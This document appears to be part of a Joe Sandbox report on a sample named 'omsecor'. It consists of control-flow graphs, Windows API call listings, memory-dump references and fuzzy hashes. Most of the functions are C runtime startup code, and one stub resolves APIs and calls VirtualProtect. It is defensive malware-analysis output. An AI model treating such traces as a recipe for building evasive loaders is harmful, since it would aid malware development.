                          control_flow_graph 70 407ab5-407abd GetProcAddress 71 407adf 70->71 72 407abf-407acc VirtualProtect 70->72 75 407ae1-407ae5 71->75 73 407ade 72->73 74 407ace-407adc VirtualProtect 72->74 73->71 74->73 76 407b24 call 407b29 75->76 77 407ae7-407aef GetModuleHandleA 75->77 79 407af1-407af9 77->79 79->79 80 407afb-407afe 79->80 80->75 81 407b00-407b02 80->81 82 407b04-407b06 81->82 83 407b08-407b10 81->83 84 407b11-407b17 GetProcAddress 82->84 83->84 87 407b18-407b20 84->87 89 407b22 87->89 89->80
                          APIs
                          • GetProcAddress.KERNEL32(00000000,00407AA6), ref: 00407AB6
                          • VirtualProtect.KERNELBASE(?,00000078,00000004,?,00000000,00000000,00407AA6,00407A8F), ref: 00407AC8
                          • VirtualProtect.KERNELBASE(?,00000078,?,?,?,00000000,00000000,00407AA6,00407A8F), ref: 00407ADC
                          • GetModuleHandleA.KERNEL32(?,00407A8F), ref: 00407AEA
                          • GetProcAddress.KERNEL32(00000000,00000000), ref: 00407B12
                          Memory Dump Source
                          • Source File: 00000017.00000002.2375599383.0000000000401000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000017.00000002.2375527486.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                          • Associated: 00000017.00000002.2375599383.000000000040D000.00000040.00000001.01000000.00000008.sdmpDownload File
                          • Associated: 00000017.00000002.2375742037.0000000000422000.00000008.00000001.01000000.00000008.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_23_2_400000_omsecor.jbxd
                          Similarity
                          • API ID: AddressProcProtectVirtual$HandleModule
                          • String ID:
                          • API String ID: 2152742572-0
                          • Opcode ID: f81dfe0726a7f77e278230a0c4648d339da411b55a21776b762b5ef698216b3c
                          • Instruction ID: 39b30828dda2cca0c429c80848ec8113aa03dbdf6ed959677c669bf53de2d5ad
                          • Opcode Fuzzy Hash: f81dfe0726a7f77e278230a0c4648d339da411b55a21776b762b5ef698216b3c
                          • Instruction Fuzzy Hash: 98F0F400E8D2043CEE2151B40C01ABBBBEC86633687241A27A211E72C3D4BC7E0692BB

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 93 402f3e-402f5c HeapCreate 94 402f61-402f6e call 402ee3 93->94 95 402f5e-402f60 93->95 98 402f70-402f7d call 405045 94->98 99 402f94-402f97 94->99 98->99 102 402f7f-402f92 HeapDestroy 98->102 102->95
                          APIs
                          • HeapCreate.KERNELBASE(00000000,00001000,00000000,004017AC,00000001), ref: 00402F4F
                          • HeapDestroy.KERNEL32 ref: 00402F85
                          Memory Dump Source
                          • Source File: 00000017.00000002.2375599383.0000000000401000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000017.00000002.2375527486.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                          • Associated: 00000017.00000002.2375599383.000000000040D000.00000040.00000001.01000000.00000008.sdmpDownload File
                          • Associated: 00000017.00000002.2375742037.0000000000422000.00000008.00000001.01000000.00000008.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_23_2_400000_omsecor.jbxd
                          Similarity
                          • API ID: Heap$CreateDestroy
                          • String ID:
                          • API String ID: 3296620671-0
                          • Opcode ID: 7bbac67fe878dc3ebcdb7e33c34032945d00a98356e3978511e20ae8c663db98
                          • Instruction ID: 98ebcd61208b82bef51758d9ec37e8992e6abd11400b15b10fa3614edeb5f36b
                          • Opcode Fuzzy Hash: 7bbac67fe878dc3ebcdb7e33c34032945d00a98356e3978511e20ae8c663db98
                          • Instruction Fuzzy Hash: D3E092706643029EEB40AB31AF0D72636E4E74078AF10843BF548F51E2EBBC8605AF4C
                          APIs
                          • IsDebuggerPresent.KERNEL32 ref: 004020B3
                          • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 004020C8
                          • UnhandledExceptionFilter.KERNEL32(00408204), ref: 004020D3
                          • GetCurrentProcess.KERNEL32(C0000409), ref: 004020EF
                          • TerminateProcess.KERNEL32(00000000), ref: 004020F6
                          Memory Dump Source
                          • Source File: 00000017.00000002.2375599383.0000000000401000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000017.00000002.2375527486.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                          • Associated: 00000017.00000002.2375599383.000000000040D000.00000040.00000001.01000000.00000008.sdmpDownload File
                          • Associated: 00000017.00000002.2375742037.0000000000422000.00000008.00000001.01000000.00000008.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_23_2_400000_omsecor.jbxd
                          Similarity
                          • API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
                          • String ID:
                          • API String ID: 2579439406-0
                          • Opcode ID: bf9e4dc40609aede9a22b05b14043da035278ae7b0f51125174d724f9b36215e
                          • Instruction ID: b20ca496c67c0111f9bdb02fdd2caa8760b953d18a2e8655b2b95bf976f6fc72
                          • Opcode Fuzzy Hash: bf9e4dc40609aede9a22b05b14043da035278ae7b0f51125174d724f9b36215e
                          • Instruction Fuzzy Hash: 5321AEB5950304DFC710EF24EF48A453BB5BF88306F10403AE549B36A1E7B859A59F9E

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 103 402465-40246f 104 402471-402478 103->104 105 402480-402483 104->105 106 40247a-40247e 104->106 107 402600-402604 105->107 108 402489-402495 call 404c30 105->108 106->104 106->105 111 40249b-4024a5 call 404c30 108->111 112 4025cc-4025d8 GetStdHandle 108->112 118 4024b4-4024ba 111->118 119 4024a7-4024ae 111->119 114 4025da-4025dd 112->114 115 4025ff 112->115 114->115 117 4025df-4025f9 call 404b40 WriteFile 114->117 115->107 117->115 118->115 122 4024c0-4024db call 404bcb 118->122 119->112 119->118 125 4024ea-402506 GetModuleFileNameA 122->125 126 4024dd-4024e7 call 404121 122->126 128 402508-40251d call 404bcb 125->128 129 40252e-402539 call 404b40 125->129 126->125 128->129 137 40251f-40252b call 404121 128->137 135 402573 129->135 136 40253b-402560 call 404b40 call 404a82 129->136 139 402575-402586 call 404a11 135->139 136->135 151 402562-402571 call 404121 136->151 137->129 146 402595-4025a8 call 404a11 139->146 147 402588-402592 call 404121 139->147 155 4025b7-4025ca call 404854 146->155 156 4025aa-4025b4 call 404121 146->156 147->146 151->139 155->115 156->155
                          APIs
                          • _strcpy_s.LIBCMT ref: 004024D1
                          • __invoke_watson.LIBCMT ref: 004024E2
                          • GetModuleFileNameA.KERNEL32(00000000,0040B091,00000104), ref: 004024FE
                          • _strcpy_s.LIBCMT ref: 00402513
                          • __invoke_watson.LIBCMT ref: 00402526
                          • _strlen.LIBCMT ref: 0040252F
                          • _strlen.LIBCMT ref: 0040253C
                          • __invoke_watson.LIBCMT ref: 00402569
                          • _strcat_s.LIBCMT ref: 0040257C
                          • __invoke_watson.LIBCMT ref: 0040258D
                          • _strcat_s.LIBCMT ref: 0040259E
                          • __invoke_watson.LIBCMT ref: 004025AF
                          • GetStdHandle.KERNEL32(000000F4,?,?,00000000,77735E70,00000003,00402631,000000FC,0040667C,00000001,00000000,00000000,?,00403FFF,?,00000001), ref: 004025CE
                          • _strlen.LIBCMT ref: 004025EF
                          • WriteFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,00403FFF,?,00000001,?,00403478,00000018,004093D0,0000000C,00403507,?), ref: 004025F9
                          Strings
                          Memory Dump Source
                          • Source File: 00000017.00000002.2375599383.0000000000401000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000017.00000002.2375527486.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                          • Associated: 00000017.00000002.2375599383.000000000040D000.00000040.00000001.01000000.00000008.sdmpDownload File
                          • Associated: 00000017.00000002.2375742037.0000000000422000.00000008.00000001.01000000.00000008.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_23_2_400000_omsecor.jbxd
                          Similarity
                          • API ID: __invoke_watson$_strlen$File_strcat_s_strcpy_s$HandleModuleNameWrite
                          • String ID: ...$<program name unknown>$Microsoft Visual C++ Runtime Library$Runtime Error!Program:
                          • API String ID: 1879448924-4022980321
                          • Opcode ID: 37e970e7a91dfcbae92fe90700a2f9926538e6433e08e305a6de03e0bd6f72c8
                          • Instruction ID: 3ad8829dabe9c8e6b7970468b651ade891dcb41a26c93daa50347fadcc2e15d8
                          • Opcode Fuzzy Hash: 37e970e7a91dfcbae92fe90700a2f9926538e6433e08e305a6de03e0bd6f72c8
                          • Instruction Fuzzy Hash: CF3127B2A402153AE62136326F5EF2F314C9B91315F14013BFE09B26D6FABD9A1441FE

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 162 401e76-401e86 GetModuleHandleA 163 401e91-401ed9 GetProcAddress * 4 162->163 164 401e88-401e90 call 401bca 162->164 166 401ef1-401f10 163->166 167 401edb-401ee2 163->167 170 401f15-401f23 TlsAlloc 166->170 167->166 169 401ee4-401eeb 167->169 169->166 171 401eed-401eef 169->171 172 401ff5 170->172 173 401f29-401f34 TlsSetValue 170->173 171->166 171->170 174 401ff7-401ff9 172->174 173->172 175 401f3a-401f89 call 402419 call 401aaa * 4 call 403378 173->175 188 401ff0 call 401bca 175->188 189 401f8b-401fa6 call 401b21 175->189 188->172 189->188 194 401fa8-401fba call 404032 189->194 194->188 197 401fbc-401fd3 call 401b21 194->197 197->188 201 401fd5-401fee call 401c07 GetCurrentThreadId 197->201 201->174
                          APIs
                          • GetModuleHandleA.KERNEL32(KERNEL32.DLL,?,004017BE), ref: 00401E7C
                          • __mtterm.LIBCMT ref: 00401E88
                            • Part of subcall function 00401BCA: TlsFree.KERNEL32(00000002,00401FF5), ref: 00401BF5
                            • Part of subcall function 00401BCA: RtlDeleteCriticalSection.NTDLL(00000000), ref: 004033DC
                            • Part of subcall function 00401BCA: RtlDeleteCriticalSection.NTDLL(00000002), ref: 00403406
                          • GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 00401E9E
                          • GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 00401EAB
                          • GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 00401EB8
                          • GetProcAddress.KERNEL32(00000000,FlsFree), ref: 00401EC5
                          • TlsAlloc.KERNEL32 ref: 00401F15
                          • TlsSetValue.KERNEL32(00000000), ref: 00401F30
                          • __init_pointers.LIBCMT ref: 00401F3A
                          • __calloc_crt.LIBCMT ref: 00401FAF
                          • GetCurrentThreadId.KERNEL32 ref: 00401FDF
                          Strings
                          Memory Dump Source
                          • Source File: 00000017.00000002.2375599383.0000000000401000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000017.00000002.2375527486.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                          • Associated: 00000017.00000002.2375599383.000000000040D000.00000040.00000001.01000000.00000008.sdmpDownload File
                          • Associated: 00000017.00000002.2375742037.0000000000422000.00000008.00000001.01000000.00000008.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_23_2_400000_omsecor.jbxd
                          Similarity
                          • API ID: AddressProc$CriticalDeleteSection$AllocCurrentFreeHandleModuleThreadValue__calloc_crt__init_pointers__mtterm
                          • String ID: FlsAlloc$FlsFree$FlsGetValue$FlsSetValue$KERNEL32.DLL
                          • API String ID: 2125014093-3819984048
                          • Opcode ID: 354152662784ca78ebbfdb9d1e706067e68d0d363f7f71506686b96da0da82fe
                          • Instruction ID: 2b6f412a48510a2ea5e28321b190ff4220801d9e6bfc04da0c4d4af9d52f3434
                          • Opcode Fuzzy Hash: 354152662784ca78ebbfdb9d1e706067e68d0d363f7f71506686b96da0da82fe
                          • Instruction Fuzzy Hash: AF318F319483029BE7146F75AF05B063AA5AF40355712053FF861B22F5EF7C8490EB5E

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 204 404854-404876 call 401b18 207 40492a-404934 204->207 208 40487c-40488b LoadLibraryA 204->208 211 404936-40493c 207->211 212 4049af-4049b7 207->212 209 404891-4048a1 GetProcAddress 208->209 210 404a0a 208->210 209->210 215 4048a7-4048e9 call 401aaa GetProcAddress call 401aaa GetProcAddress call 401aaa call 4021f2 209->215 216 404a0c-404a10 210->216 211->212 217 40493e-404957 call 401b21 * 2 211->217 213 4049b9-4049c2 call 401b21 212->213 214 4049ea-4049f8 call 401b21 212->214 213->214 227 4049c4-4049cb 213->227 214->210 226 4049fa-404a08 214->226 244 4048f8-4048fc 215->244 245 4048eb-4048f5 call 404121 215->245 217->212 232 404959-40495b 217->232 226->216 227->214 237 4049cd-4049d5 227->237 232->212 236 40495d-404961 232->236 246 404963-404974 236->246 247 40497c-404988 call 402229 236->247 237->214 239 4049d7-4049e0 call 401b21 237->239 239->214 252 4049e2-4049e7 239->252 244->207 250 4048fe-404914 GetProcAddress call 401aaa 244->250 245->244 246->247 258 404976-40497a 246->258 259 404997-40499b 247->259 260 40498a-404994 call 404121 247->260 250->207 264 404916-404925 GetProcAddress call 401aaa 250->264 252->214 258->212 258->247 262 4049a6-4049ad 259->262 263 40499d-4049a4 259->263 260->259 262->214 263->214 264->207
                          APIs
                          • LoadLibraryA.KERNEL32(USER32.DLL,00000000,00000000,00000314,?,?,?,0040B078,004025C7,0040B078,Microsoft Visual C++ Runtime Library,00012010), ref: 00404881
                          • GetProcAddress.KERNEL32(00000000,MessageBoxA), ref: 0040489D
                            • Part of subcall function 00401AAA: TlsGetValue.KERNEL32(00000000,00401B1F,00000000,00404862,00000000,00000000,00000314,?,?,?,0040B078,004025C7,0040B078,Microsoft Visual C++ Runtime Library,00012010), ref: 00401AB7
                            • Part of subcall function 00401AAA: TlsGetValue.KERNEL32(00000004,?,?,?,0040B078,004025C7,0040B078,Microsoft Visual C++ Runtime Library,00012010), ref: 00401ACE
                          • GetProcAddress.KERNEL32(00000000,00000000), ref: 004048BA
                            • Part of subcall function 00401AAA: GetModuleHandleA.KERNEL32(KERNEL32.DLL,?,?,?,0040B078,004025C7,0040B078,Microsoft Visual C++ Runtime Library,00012010), ref: 00401AE3
                            • Part of subcall function 00401AAA: GetProcAddress.KERNEL32(00000000,EncodePointer), ref: 00401AFE
                          • GetProcAddress.KERNEL32(00000000,00000000), ref: 004048CF
                          • __invoke_watson.LIBCMT ref: 004048F0
                            • Part of subcall function 00404121: _memset.LIBCMT ref: 004041AD
                            • Part of subcall function 00404121: IsDebuggerPresent.KERNEL32(?,?,00000000), ref: 004041CB
                            • Part of subcall function 00404121: SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,00000000), ref: 004041D5
                            • Part of subcall function 00404121: UnhandledExceptionFilter.KERNEL32(0040B078,?,?,00000000), ref: 004041DF
                            • Part of subcall function 00404121: GetCurrentProcess.KERNEL32(C000000D,?,?,00000000), ref: 004041FA
                            • Part of subcall function 00404121: TerminateProcess.KERNEL32(00000000,?,?,00000000), ref: 00404201
                            • Part of subcall function 00401B21: TlsGetValue.KERNEL32(00000000,00401BB6,?,?,?,00402F66), ref: 00401B2E
                            • Part of subcall function 00401B21: TlsGetValue.KERNEL32(00000004,?,?,?,00402F66), ref: 00401B45
                            • Part of subcall function 00401B21: GetModuleHandleA.KERNEL32(KERNEL32.DLL,?,?,?,00402F66), ref: 00401B5A
                            • Part of subcall function 00401B21: GetProcAddress.KERNEL32(00000000,DecodePointer), ref: 00401B75
                          • GetProcAddress.KERNEL32(00000000,GetUserObjectInformationA), ref: 00404904
                          • GetProcAddress.KERNEL32(00000000,GetProcessWindowStation), ref: 0040491C
                          • __invoke_watson.LIBCMT ref: 0040498F
                          Strings
                          Memory Dump Source
                          • Source File: 00000017.00000002.2375599383.0000000000401000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000017.00000002.2375527486.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                          • Associated: 00000017.00000002.2375599383.000000000040D000.00000040.00000001.01000000.00000008.sdmpDownload File
                          • Associated: 00000017.00000002.2375742037.0000000000422000.00000008.00000001.01000000.00000008.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_23_2_400000_omsecor.jbxd
                          Similarity
                          • API ID: AddressProc$Value$ExceptionFilterHandleModuleProcessUnhandled__invoke_watson$CurrentDebuggerLibraryLoadPresentTerminate_memset
                          • String ID: GetActiveWindow$GetLastActivePopup$GetProcessWindowStation$GetUserObjectInformationA$MessageBoxA$USER32.DLL
                          • API String ID: 2940365033-232180764
                          • Opcode ID: d0843e3b680be133648664f8717c69194e3d07d516d4994a3cb1c1e79535d4f8
                          • Instruction ID: 59fbdf2cbb2ff75c7ae2a14c3bd4fe5a66861bdf874bec260bfce3d1cd22fe51
                          • Opcode Fuzzy Hash: d0843e3b680be133648664f8717c69194e3d07d516d4994a3cb1c1e79535d4f8
                          • Instruction Fuzzy Hash: FD4163F1D00205AEDF10AFB59D86A6F7BA4EB94305B14083FE505F22E0DB7D9944CA5E

                          Control-flow Graph

                          APIs
                          • GetModuleHandleA.KERNEL32(KERNEL32.DLL,00409328,0000000C,00401D18,00000000,00000000,?,?,?,00402F66), ref: 00401C18
                          • GetProcAddress.KERNEL32(?,EncodePointer), ref: 00401C4C
                          • GetProcAddress.KERNEL32(?,DecodePointer), ref: 00401C5C
                          • InterlockedIncrement.KERNEL32(0040A3C8), ref: 00401C7E
                          • __lock.LIBCMT ref: 00401C86
                          • ___addlocaleref.LIBCMT ref: 00401CA5
                          Strings
                          Memory Dump Source
                          • Source File: 00000017.00000002.2375599383.0000000000401000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000017.00000002.2375527486.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                          • Associated: 00000017.00000002.2375599383.000000000040D000.00000040.00000001.01000000.00000008.sdmpDownload File
                          • Associated: 00000017.00000002.2375742037.0000000000422000.00000008.00000001.01000000.00000008.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_23_2_400000_omsecor.jbxd
                          Similarity
                          • API ID: AddressProc$HandleIncrementInterlockedModule___addlocaleref__lock
                          • String ID: DecodePointer$EncodePointer$KERNEL32.DLL
                          • API String ID: 1036688887-2843748187
                          • Opcode ID: 6573cce91d4b34aeafb212c3c1fc7eea0ad3c310865ce8df9fb52cfb0840fec2
                          • Instruction ID: 560e36331183b230e08dea58ace58335192f7a528c6e8c7e040251058e5fa637
                          • Opcode Fuzzy Hash: 6573cce91d4b34aeafb212c3c1fc7eea0ad3c310865ce8df9fb52cfb0840fec2
                          • Instruction Fuzzy Hash: 32113D719847019EE7209F76CA45B5ABBE4AF04348F10853FE899B62E1CB7C99418F19

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 287 402c5b-402c82 call 402f98 GetStartupInfoA 290 402c83 call 404032 287->290 291 402c88-402c8c 290->291 292 402e92 291->292 293 402c92-402ca3 291->293 295 402e95-402e9a call 402fdd 292->295 294 402cce-402cd0 293->294 296 402cd2-402cd6 294->296 297 402ca5-402cc8 294->297 299 402dd9 296->299 300 402cdc-402ce1 296->300 297->294 302 402ddb-402deb 299->302 300->299 303 402ce7-402cf9 300->303 304 402df8-402dfe 302->304 305 402ded-402df0 302->305 306 402cfb 303->306 307 402cfd-402d00 303->307 309 402e00-402e03 304->309 310 402e05-402e0c 304->310 305->304 308 402df2-402df6 305->308 306->307 311 402d54-402d5a 307->311 314 402e6a-402e6e 308->314 315 402e0f-402e1b GetStdHandle 309->315 310->315 312 402d02-402d04 311->312 313 402d5c 311->313 316 402d06 call 404032 312->316 317 402d64-402d6a 313->317 314->302 318 402e74-402e82 SetHandleCount 314->318 319 402e60-402e64 315->319 320 402e1d-402e1f 315->320 321 402d0b-402d0f 316->321 317->299 322 402d6c-402d74 317->322 318->295 319->314 320->319 323 402e21-402e2a GetFileType 320->323 324 402d11-402d27 321->324 325 402d5e 321->325 326 402d76-402d79 322->326 327 402dcc-402dd7 322->327 323->319 328 402e2c-402e36 323->328 329 402d4f-402d51 324->329 325->317 326->327 330 402d7b-402d7f 326->330 327->299 327->322 331 402e38-402e3c 328->331 332 402e3e-402e41 328->332 335 402d53 329->335 336 402d29-402d49 329->336 330->327 337 402d81-402d83 330->337 333 402e47-402e4f 331->333 332->333 334 402e43 332->334 338 402e50 call 404763 333->338 334->333 335->311 336->329 339 402d90-402db9 337->339 340 402d85-402d8e GetFileType 337->340 342 402e55-402e59 338->342 341 402dba call 404763 339->341 340->327 340->339 343 402dbf-402dc3 341->343 342->292 344 402e5b-402e5e 342->344 343->292 345 402dc9 343->345 344->314 345->327
                          APIs
                          • GetStartupInfoA.KERNEL32(?), ref: 00402C70
                          • __calloc_crt.LIBCMT ref: 00402C83
                            • Part of subcall function 00404032: __calloc_impl.LIBCMT ref: 00404040
                            • Part of subcall function 00404032: Sleep.KERNEL32(00000000), ref: 00404057
                          • __calloc_crt.LIBCMT ref: 00402D06
                          • GetFileType.KERNEL32(00000038), ref: 00402D86
                          • ___crtInitCritSecAndSpinCount.LIBCMT ref: 00402DBA
                          • GetStdHandle.KERNEL32(-000000F6), ref: 00402E10
                          • GetFileType.KERNEL32(00000000), ref: 00402E22
                          • ___crtInitCritSecAndSpinCount.LIBCMT ref: 00402E50
                          • SetHandleCount.KERNEL32 ref: 00402E7A
                          Memory Dump Source
                          • Source File: 00000017.00000002.2375599383.0000000000401000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000017.00000002.2375527486.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                          • Associated: 00000017.00000002.2375599383.000000000040D000.00000040.00000001.01000000.00000008.sdmpDownload File
                          • Associated: 00000017.00000002.2375742037.0000000000422000.00000008.00000001.01000000.00000008.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_23_2_400000_omsecor.jbxd
                          Similarity
                          • API ID: Count$CritFileHandleInitSpinType___crt__calloc_crt$InfoSleepStartup__calloc_impl
                          • String ID:
                          • API String ID: 1318386821-0
                          • Opcode ID: f5d02d02a8b2d0f0c38f4cc661f228c40208417c0c2fd58e7995995fa6c6c4fe
                          • Instruction ID: b2392c38ea11d8206f0d28861f948c6360aed0bed67f1e2b59f3cb23873ff797
                          • Opcode Fuzzy Hash: f5d02d02a8b2d0f0c38f4cc661f228c40208417c0c2fd58e7995995fa6c6c4fe
                          • Instruction Fuzzy Hash: 366136715447518ED7248B38CB4C7167BA0EF02324F29437BD9A5BB2E1D7B89806CB9D

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 346 403bd3-403bfa call 403b59 349 403c0a-403c0d 346->349 350 403bfc-403c05 call 403854 346->350 352 403c0f-403c15 349->352 357 403d9d-403da4 350->357 354 403c1b-403c26 352->354 355 403cac-403cd0 call 405f60 352->355 354->352 358 403c28-403c2e 354->358 364 403cfc-403cff 355->364 359 403da5 call 401662 357->359 361 403c34-403c3a 358->361 362 403d9a 358->362 363 403daa-403dab 359->363 361->362 365 403c40-403c4c IsValidCodePage 361->365 362->357 367 403d01-403d11 364->367 368 403cd2-403cd7 364->368 365->362 366 403c52-403c5f GetCPInfo 365->366 369 403c65-403c83 call 405f60 366->369 370 403d8e-403d94 366->370 367->364 371 403d13-403d32 call 403825 367->371 368->367 372 403cd9-403cdf 368->372 380 403d81 369->380 381 403c89-403c8d 369->381 370->350 370->362 382 403d33-403d3e 371->382 375 403cf3-403cf5 372->375 378 403ce1-403cf2 375->378 379 403cf7-403cfb 375->379 378->375 379->364 383 403d84-403d8c 380->383 384 403d62-403d65 381->384 385 403c93 381->385 382->382 386 403d40-403d47 call 4038a9 382->386 383->386 389 403d6a-403d6f 384->389 387 403c96-403c9a 385->387 396 403d4c-403d51 386->396 387->384 390 403ca0-403ca7 387->390 389->389 392 403d71-403d7f call 403825 389->392 394 403d52-403d54 390->394 392->383 394->396 397 403d56-403d5c 394->397 396->394 397->384 397->387
                          APIs
                          • getSystemCP.LIBCMT ref: 00403BEC
                            • Part of subcall function 00403B59: _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 00403B66
                            • Part of subcall function 00403B59: GetOEMCP.KERNEL32(00000000,?,00402A85,?,?,00000001), ref: 00403B80
                          • setSBCS.LIBCMT ref: 00403BFE
                            • Part of subcall function 00403854: _memset.LIBCMT ref: 00403867
                          • IsValidCodePage.KERNEL32(-00000030,00000000,?,00000000,00409430), ref: 00403C44
                          • GetCPInfo.KERNEL32(00000000,00403F56), ref: 00403C57
                          • _memset.LIBCMT ref: 00403C6F
                          • setSBUpLow.LIBCMT ref: 00403D42
                          Memory Dump Source
                          • Source File: 00000017.00000002.2375599383.0000000000401000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000017.00000002.2375527486.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                          • Associated: 00000017.00000002.2375599383.000000000040D000.00000040.00000001.01000000.00000008.sdmpDownload File
                          • Associated: 00000017.00000002.2375742037.0000000000422000.00000008.00000001.01000000.00000008.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_23_2_400000_omsecor.jbxd
                          Similarity
                          • API ID: Locale_memset$CodeInfoPageSystemUpdateUpdate::_Valid
                          • String ID:
                          • API String ID: 2658552758-0
                          • Opcode ID: 85fbc29d6093aa115f5ab7fa086d66e65b660b38745e4bae39b2770f61390fd6
                          • Instruction ID: 0e9026f4e105130f7015617c44e62dc713e6d3fa9c6682f74f6de7838a23a284
                          • Opcode Fuzzy Hash: 85fbc29d6093aa115f5ab7fa086d66e65b660b38745e4bae39b2770f61390fd6
                          • Instruction Fuzzy Hash: 875108319042558BDB159F25C8442BABFB8EF05306F14847FE881FF282C63CCA46DB99

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 398 401aaa-401abb TlsGetValue 399 401abd-401ac5 398->399 400 401ade-401aed GetModuleHandleA 398->400 399->400 401 401ac7-401ad4 TlsGetValue 399->401 402 401b12-401b17 400->402 403 401aef-401af6 call 401a3e 400->403 401->400 407 401ad6-401adc 401->407 403->402 408 401af8-401afe GetProcAddress 403->408 409 401b04-401b06 407->409 408->409 409->402 410 401b08-401b0e 409->410 410->402
                          APIs
                          • TlsGetValue.KERNEL32(00000000,00401B1F,00000000,00404862,00000000,00000000,00000314,?,?,?,0040B078,004025C7,0040B078,Microsoft Visual C++ Runtime Library,00012010), ref: 00401AB7
                          • TlsGetValue.KERNEL32(00000004,?,?,?,0040B078,004025C7,0040B078,Microsoft Visual C++ Runtime Library,00012010), ref: 00401ACE
                          • GetModuleHandleA.KERNEL32(KERNEL32.DLL,?,?,?,0040B078,004025C7,0040B078,Microsoft Visual C++ Runtime Library,00012010), ref: 00401AE3
                          • GetProcAddress.KERNEL32(00000000,EncodePointer), ref: 00401AFE
                          Strings
                          Memory Dump Source
                          • Source File: 00000017.00000002.2375599383.0000000000401000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000017.00000002.2375527486.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                          • Associated: 00000017.00000002.2375599383.000000000040D000.00000040.00000001.01000000.00000008.sdmpDownload File
                          • Associated: 00000017.00000002.2375742037.0000000000422000.00000008.00000001.01000000.00000008.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_23_2_400000_omsecor.jbxd
                          Similarity
                          • API ID: Value$AddressHandleModuleProc
                          • String ID: EncodePointer$KERNEL32.DLL
                          • API String ID: 1929421221-3682587211
                          • Opcode ID: cfafac40d43195ef6ab0f83e6a66070465950e04f68e4f312de4a4817b66f2e0
                          • Instruction ID: 2de7d8fd10128b17cfc71597f2b569db04ade18300f5c4710948ea3b5a4a2571
                          • Opcode Fuzzy Hash: cfafac40d43195ef6ab0f83e6a66070465950e04f68e4f312de4a4817b66f2e0
                          • Instruction Fuzzy Hash: 68F06D307017169BD7219F25DE04A5A3AB8AF80790B16417AB844F62F4EF38DC029A6D

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 412 401b21-401b32 TlsGetValue 413 401b34-401b3c 412->413 414 401b55-401b64 GetModuleHandleA 412->414 413->414 415 401b3e-401b4b TlsGetValue 413->415 416 401b66-401b6d call 401a3e 414->416 417 401b89-401b8e 414->417 415->414 421 401b4d-401b53 415->421 416->417 422 401b6f-401b75 GetProcAddress 416->422 423 401b7b-401b7d 421->423 422->423 423->417 424 401b7f-401b85 423->424 424->417
                          APIs
                          • TlsGetValue.KERNEL32(00000000,00401BB6,?,?,?,00402F66), ref: 00401B2E
                          • TlsGetValue.KERNEL32(00000004,?,?,?,00402F66), ref: 00401B45
                          • GetModuleHandleA.KERNEL32(KERNEL32.DLL,?,?,?,00402F66), ref: 00401B5A
                          • GetProcAddress.KERNEL32(00000000,DecodePointer), ref: 00401B75
                          Strings
                          Memory Dump Source
                          • Source File: 00000017.00000002.2375599383.0000000000401000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000017.00000002.2375527486.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                          • Associated: 00000017.00000002.2375599383.000000000040D000.00000040.00000001.01000000.00000008.sdmpDownload File
                          • Associated: 00000017.00000002.2375742037.0000000000422000.00000008.00000001.01000000.00000008.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_23_2_400000_omsecor.jbxd
                          Similarity
                          • API ID: Value$AddressHandleModuleProc
                          • String ID: DecodePointer$KERNEL32.DLL
                          • API String ID: 1929421221-629428536
